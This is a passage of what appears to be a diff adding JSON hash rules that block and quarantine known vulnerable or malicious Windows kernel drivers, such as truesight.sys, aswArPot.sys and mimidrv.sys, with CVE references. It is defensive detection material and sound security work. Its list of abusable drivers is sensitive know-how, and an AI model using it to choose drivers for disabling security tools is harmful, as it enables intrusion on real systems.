"e2b6350e17e9b24b7140eed743b4ae0b01453bbb8cb73b091b51e2306017d80f", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "21ecad1e-431f-56b5-a336-b69db5a220e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810646Z", + "creation_date": "2026-03-23T11:45:31.810648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810653Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d86545c85fa90faa95f5d67723686174f82107dd423feba54907ce0e4297f87", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22054282-f6c4-58d4-bd1f-5515b4a07cf0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481115Z", + "creation_date": "2026-03-23T11:45:30.481117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481123Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3a74ac9d23efaa857333a4d8a40ed0026f28575475deeb6eb301fcc0db34efc", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2215df9f-951b-5cb3-8d9f-e394810e80c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145956Z", + "creation_date": "2026-03-23T11:45:31.145959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebce1e4dc3b7128e7bfb61ce564b00e2643d3824d3bdf59ffdb3dcdc179aa03c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22199dd4-c945-5622-9ca4-7639c7c97a78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968892Z", + "creation_date": "2026-03-23T11:45:29.968894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19d0fc91b70d7a719f7a28b4ad929f114bf1de94a4c7cba5ad821285a4485da0", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2235af9e-6f98-5d24-aa4f-b79e89f8cc0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983832Z", + "creation_date": "2026-03-23T11:45:29.983834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47489362609fa9bd398deec955d5600780bb3788eb29a282bcc5245905713eb0", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22411822-4752-52f3-8877-0fd21ba88070", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613242Z", + "creation_date": "2026-03-23T11:45:29.613244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "224b83bb-9e02-55c4-8346-343791bd86c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969984Z", + "creation_date": "2026-03-23T11:45:29.969986Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47f64d6753f40388382097351a26dad54b8fdf59529a24acc65e9ced440ee2c6", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] 
[https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "224bc865-63ed-5e39-a42a-fb58711c33da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475507Z", + "creation_date": "2026-03-23T11:45:31.475511Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ab7f3cae3cda68c14847807f120099d150062ba0d3af26e500dce2b099c5ae3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "224ff849-5ac7-59e8-9a76-6e6b46bc4e3f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152631Z", + "creation_date": 
"2026-03-23T11:45:31.152633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152639Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b4ff34191eff716061cc36b039bb79db011c7f4a86cb0f1a0e9a5f6bd1b8913", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "225537ae-c682-5d94-9322-54b96efef55e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836047Z", + "creation_date": "2026-03-23T11:45:30.836049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54b5c0860d299f087df2aef68ba94dedafda743d320cdb34983a74b7abc6b51e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "22573e41-4e25-55ae-b043-c90575b87d14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160988Z", + "creation_date": "2026-03-23T11:45:31.160990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d46ac2d32333f11249ab2cb55903a1736d2fe5ed4206b49fb4d6ed151bd5f5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "225adcae-7df7-5eb6-a770-a8fdc8300a1b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487825Z", + "creation_date": "2026-03-23T11:45:31.487827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487833Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a72552491b4974eefcd717068c211312b14ad187161853bdaff458f734fa9e33", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "225f0cc6-67f0-5fd6-ae9e-7ce48f384bfe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607036Z", + "creation_date": "2026-03-23T11:45:29.607038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2e351efd57c89bc0c7b9d4d440113304d0b8a4c88cdf0126442171aa50634d4", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2265c449-bd48-50f8-a481-44f42e5720a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814839Z", + "creation_date": "2026-03-23T11:45:31.814843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d01473998e75d5f07507fad0eef36a95847b2f181fa951545f9f894f39eebdb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2265d2c9-8233-5a1f-8958-db62bd70f760", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471498Z", + "creation_date": "2026-03-23T11:45:30.471502Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "707b4b5f5c4585156d8a4d8c39cf26729f5ad05d7f77b17f48e670e808e3e6a0", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "226b4eda-bb45-5dc4-b886-1cadd2cf34d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500602Z", + "creation_date": "2026-03-23T11:45:31.500605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e79d273fc5bf32ba7bd526428b19322805eaebfbf7ecfde8fa51511085cc9be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22762581-1ab3-5674-a9a6-2fc29c1a6ff7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { 
+ "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.623045Z", + "creation_date": "2026-03-23T11:45:29.623047Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.623052Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9996b31234ba736fc2c6f2b75f641e25d156f19d6ac84cf85283fde08a714842", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22767396-370b-5c7d-9ef8-8cc6e8a3c900", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463670Z", + "creation_date": "2026-03-23T11:45:30.463674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07beac65e28ee124f1da354293a3d6ad7250ed1ce29b8342acfd22252548a5af", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "227d63ea-036c-5b18-8aa9-905e79b2157e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622071Z", + "creation_date": "2026-03-23T11:45:29.622073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19c74ea0e0baf04820e5642bd2fa224158801ed966be1041539e3c55bd65c471", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2290678e-0c9f-5db1-ab39-7e4bb04f5bff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974195Z", + "creation_date": "2026-03-23T11:45:29.974197Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974202Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "683f0af364f8a19f81d2e095e17de6d403ba3672bdf4a1caf601bca5b57454df", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22a41698-78c8-5c2f-9779-2564483cbf96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614317Z", + "creation_date": "2026-03-23T11:45:29.614318Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22aad86c-63f6-53f2-b100-8806f8a5c54a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, 
+ "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821844Z", + "creation_date": "2026-03-23T11:45:30.821848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aac9c11490da2ad5316469aa91943b42d019b51ff6f1d9d9767260abd075bb8f", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22ab7e4e-5009-5309-b8d1-16878da04f4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606847Z", + "creation_date": "2026-03-23T11:45:29.606849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606855Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e38148ad4ed9946e8600b37f63996bf17c0101e3f50123b3b8513c895a4b521", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22ac0514-acd4-55fc-91c4-347208a3ffdf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969924Z", + "creation_date": "2026-03-23T11:45:29.969926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2537f2ad83f5efc841ed75081d5dfffeb04eea92abfb9844adc091ff2a671b56", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "22cf99e1-2be5-5e4f-973e-9aa98085ad09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
